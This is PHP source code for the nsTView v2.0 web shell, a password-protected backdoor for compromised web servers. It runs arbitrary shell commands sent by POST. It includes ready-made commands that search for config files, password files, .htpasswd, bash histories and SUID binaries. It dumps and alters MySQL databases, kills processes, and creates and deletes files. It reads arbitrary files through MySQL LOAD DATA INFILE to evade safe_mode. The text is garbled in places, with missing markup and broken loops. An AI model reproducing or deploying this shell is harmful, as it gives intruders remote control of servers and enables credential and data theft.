@session_start();
@set_time_limit(0);
@set_magic_quotes_runtime(0);
@error_reporting(0);
#####cfg#####
# use password true / false #
$create_password = true;
$password = "enslaved"; // default password for nstview, you can change it.
# UNIX COMMANDS
# description (nst) command
# example: Shutdown (nst) shutdown -h now
$fast_commands = "
Show open ports (nst) netstat -an | grep LISTEN | grep tcp
last root (nst) last root
last (all users) (nst) last all
Find all config.php in / (nst) find / -type f -name config.php
Find all config.php in . (nst) find . -type f -name config.php
Find all admin.php in / (nst) find / -type f -name admin.php
Find all admin.php in . (nst) find . -type f -name admin.php
Find all config.inc.php in / (nst) find / -type f -name config.inc.php
Find all config.inc.php in . (nst) find . -type f -name config.inc.php
Find all config.inc in / (nst) find / -type f -name config.inc
Find all config.inc in . (nst) find . -type f -name config.inc
Find all config.dat in / (nst) find / -type f -name config.dat
Find all config.dat in . (nst) find . -type f -name config.dat
Find all config* in / (nst) find / -type f -name config*
Find all config* in . (nst) find . -type f -name config*
Find all pass* in / (nst) find / -type f -name pass*
Find all pass* in . (nst) find . -type f -name pass*
Find all .bash_history in / (nst) find / -type f -name .bash_history
Find all .bash_history in . (nst) find . -type f -name .bash_history
Find all .htpasswd in / (nst) find / -type f -name .htpasswd
Find all .htpasswd in . (nst) find . -type f -name .htpasswd
Find all writable dirs/files in / (nst) find / -perm -2 -ls
Find all writable dirs/files in . (nst) find . -perm -2 -ls
Find all suid files in / (nst) find / -type f -perm -04000 -ls
Find all suid files in . (nst) find . -type f -perm -04000 -ls
Find all sgid files in / (nst) find / -type f -perm -02000 -ls
Find all sgid files in . (nst) find . -type f -perm -02000 -ls
Find all .fetchmailrc files in / (nst) find / -type f -name .fetchmailrc
Find all .fetchmailrc files in . (nst) find . -type f -name .fetchmailrc
OS Version? (nst) sysctl -a | grep version
Kernel version? (nst) cat /proc/version
cat syslog.conf (nst) cat /etc/syslog.conf
Cat - Message of the day (nst) cat /etc/motd
Cat hosts (nst) cat /etc/hosts
Distrib name (nst) cat /etc/issue.net
Distrib name (2) (nst) cat /etc/*-realise
Display all process - wide output (nst) ps auxw
Display all your process (nst) ps ux
Interfaces (nst) ifconfig
CPU? (nst) cat /proc/cpuinfo
RAM (nst) free -m
HDD space (nst) df -h
List of Attributes (nst) lsattr -a
Mount options (nst) cat /etc/fstab
Is cURL installed? (nst) which curl
Is wGET installed? (nst) which wget
Is lynx installed? (nst) which lynx
Is links installed? (nst) which links
Is fetch installed? (nst) which fetch
Is GET installed? (nst) which GET
Is perl installed? (nst) which perl
Where is apache (nst) whereis apache
Where is perl (nst) whereis perl
locate proftpd.conf (nst) locate proftpd.conf
locate httpd.conf (nst) locate httpd.conf
locate my.conf (nst) locate my.conf
locate psybnc.conf (nst) locate psybnc.conf
";
# WINDOWS COMMANDS
# description (nst) command
# example: Delete autoexec.bat (nst) del c:\autoexec.bat
$fast_commands_win = "
OS Version (nst) ver
Tasklist (nst) tasklist
Attributes in . (nst) attrib
Show open ports (nst) netstat -an
";
######ver####
$ver= "v2.0";
#############
$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}
if ($_SERVER["HTTP_CLIENT_IP"]) $ip = $_SERVER["HTTP_CLIENT_IP"];
else if($_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if($_SERVER["REMOTE_ADDR"]) $ip = $_SERVER["REMOTE_ADDR"];
else $ip = $_SERVER['REMOTE_ADDR'];
$ip=htmlspecialchars($ip);
if($create_password==true){
if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("
";
print "";
mysql_query($up_string) or die("".mysql_error()."");
}#end of make update
if($_POST['upd']=='insert'){
preg_match_all("/name='(.*?)'\scols=39\srows=5>(.*?)<\/textarea>/i",$buff,$matches3);
$delstring=$_POST['delstring'];
$delstring=base64_decode($delstring);
$delstring = substr($delstring, 0, strlen($delstring)-5);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\";
";
print "";
}#end of insert
}#end of update
}
# end of edit row
# insert new line
if($_GET['ins_new_line']){
$qn = mysql_query('SHOW FIELDS FROM '.$tbl) or die("".mysql_error()."");
print "";
if($_POST['mk_ins']){
preg_match_all("/(.*?)\s/i",$buff2,$matches3);
for($i=0; $i".mysql_error()."");
print "PHP var: \$sql=\"$make_insert\";
";
print "";
}#end of mk ins
}#end of ins new line
if(isset($_GET['rename_table'])){
$rename_table=$_GET['rename_table'];
print "
Rename $rename_table to
";
if(isset($_POST['new_name'])){
mysql_select_db($db) or die("".mysql_error()."");
mysql_query("RENAME TABLE $rename_table TO ".$_POST['new_name']) or die("".mysql_error()."");
print " Table $rename_table renamed to ".$_POST['new_name']."";
print "";
}
}#end of rename
# dump table
if($_GET['dump']){
if(!is_writable($f_d)){die("
This folder $f_d isnt writable! Cannot make dump.
You can change temp folder for dump file in your browser!
Change variable &f_d=(here writable directory, expl: /tmp or c:/windows/temp)
Then press enter
");}
mysql_select_db($db) or die("".mysql_error()."");
$fp = fopen($f_d."/".$f,"w");
fwrite($fp, "# nsTView.php v$ver
# Web: http://nst.void.ru
# Dump from: ".$_SERVER["SERVER_NAME"]." (".$_SERVER["SERVER_ADDR"].")
# MySQL version: ".mysql_get_server_info()."
# PHP version: ".phpversion()."
# Date: ".date("d.m.Y - H:i:s")."
# Dump db ( $db ) Table ( $tbl )
# --- eof ---
");
$que = mysql_query("SHOW CREATE TABLE `$tbl`") or die("".mysql_error()."");
$row = mysql_fetch_row($que);
fwrite($fp, "DROP TABLE IF EXISTS `$tbl`;\r\n");
$row[1]=str_replace("\n","\r\n",$row[1]);
fwrite($fp, $row[1].";\r\n\r\n");
$que = mysql_query("SELECT * FROM `$tbl`");
if(mysql_num_rows($que)>0){
while($row = mysql_fetch_assoc($que)){
$keys = join("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = adds2($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tbl`(`$keys`) VALUES ('".$values."');\r\n";
fwrite($fp, $sql);
}
}
fclose($fp);
print "";
}#end of dump
# db dump
if($_GET['dump_db']){
$c=mysql_num_rows(mysql_list_tables($db));
if($c>=1){
print "
";
}else{$hmm="DELETED";}
print "";
}
if($os=="unix"){
function fastcmd(){
global $fast_commands;
$c_f=explode("\n",$fast_commands);
$c_f=count($c_f)-2;
print "
";
}
}#end of os unix
if($os=="win"){
function fastcmd(){
global $fast_commands_win;
$c_f=explode("\n",$fast_commands_win);
$c_f=count($c_f)-2;
print "
";
}
}#end of os win
echo "
";
if(@$_GET['shell']=="1"){echo "
cmd pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
if(@$_POST['sh']){
$sh=$_POST['sh'];
echo "
";
print `$sh`; echo "
";}
}
if(@$_GET['shell']=="2"){
echo "
cmd
pwd:
";
chdir($d);
echo getcwd()."
Fast cmd: ";
fastcmd();
if($os=="win"){$d=str_replace("/","\\\\",$d);}
print "
Insert pwd
";
if(@$_POST['sh']){
$sh=$_POST['sh'];
echo "
"; print `$sh`; echo "
";}
echo $copyr;
exit;}
if(@$_GET['delfl']){
@$delfolder=$_GET['delfolder'];
echo "DELETE FOLDER: ".@$_GET['delfolder']."
(All files must be writable) Yes || No
";
if($_POST['dir_n']){
mkdir($d."/".$_POST['dir_n']) or die('Cannot create directory '.$_POST['dir_n']);
print "Directory created success!";
}
print $copyr;
die;
}
$mkfile=$_GET['mkfile'];
if($mkfile){
print " Create file in $d :
";
if($_POST['file_n']){
$fp=fopen($d."/".$_POST['file_n'],"w") or die('Cannot create file '.$_POST['file_n']);
fwrite($fp,"");
print "File created success!";
}
print $copyr;
die;
}
$ps_table=$_GET['ps_table'];
if($ps_table){
if($_POST['kill_p']){
exec("kill -9 ".$_POST['kill_p']);
}
$str=`ps aux`;
preg_match_all("/(?:.*?)([0-9]{1,7})(.*?)\s\s\s[0-9]:[0-9][0-9]\s(.*)/i",$str,$matches);
print " PS Table :: Fast kill program
";
print "
";
for($i=0; $i
$expl[0]
PID: ".$matches[1][$i]." :: ".$matches[3][$i]."
";
}#end of for
print "
";
unset($str);
print $copyr;
die;
}#end of ps table
$read_file_safe_mode=$_GET['read_file_safe_mode'];
if($read_file_safe_mode){
if(!isset($_POST['l'])){$_POST['l']="root";}
print "
Read file content using MySQL - when safe_mode, open_basedir is ON
";
if($_POST['read_file']){
$read_file=$_POST['read_file'];
@mysql_connect($_POST['serv_ip'].":".$_POST['port'],$_POST['l'],$_POST['p']) or die("".mysql_error()."");
mysql_create_db("tmp_bd_file") or die("".mysql_error()."");
mysql_select_db("tmp_bd_file") or die("".mysql_error()."");
mysql_query('CREATE TABLE `tmp_file` ( `file` LONGBLOB NOT NULL );') or die("".mysql_error()."");
mysql_query("LOAD DATA INFILE \"".addslashes($read_file)."\" INTO TABLE tmp_file");
$query = "SELECT * FROM tmp_file";
$result = mysql_query($query) or die("".mysql_error()."");
print "File content: